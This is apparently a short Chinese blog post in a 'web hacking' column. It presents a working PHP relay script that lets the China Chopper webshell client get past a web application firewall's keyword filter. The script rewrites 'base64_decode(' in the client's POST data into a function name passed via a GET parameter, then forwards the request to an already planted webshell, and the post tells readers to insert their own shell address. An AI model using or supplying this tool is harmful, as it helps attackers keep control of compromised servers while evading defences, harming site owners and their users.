菜刀杀狗

最新推荐文章于 2021-03-22 01:40:15 发布

eT48_Sec

最新推荐文章于 2021-03-22 01:40:15 发布

阅读量660

点赞数

分类专栏：编程 web hacking

编程同时被 2 个专栏收录

20 篇文章 0 订阅

订阅专栏

web hacking

15 篇文章 0 订阅

订阅专栏

中转是一种思路，把狗拦截的关键字以一种等效的方式替换为其他的。

<?php 
$webshell="http://www.example.com/1.php";//把这里改成你的shell地址 
$webshell=$webshell."?&1141056911=base64_decode";
 
$da=$_POST; 
$data = $da; 
@$data=str_replace("base64_decode(",'$_GET[1141056911](',$data); 
//接收菜刀的post，并把base64_decode替换成$_GET[1141056911](
 
//print_r($data); 
 
$data = http_build_query($data);   
$opts = array (   
'http' => array (   
'method' => "POST",   
'header'=> "Content-type: application/x-www-form-urlencoded\r\n" .   
           "Content-Length: " . strlen($data) . "\r\n",   
'content' => $data) 
); 
 
$context = stream_context_create($opts);   
$html = @file_get_contents($webshell, false, $context); //发送post  
echo $html;   
 
?>

原文：http://zone.wooyun.org/content/10278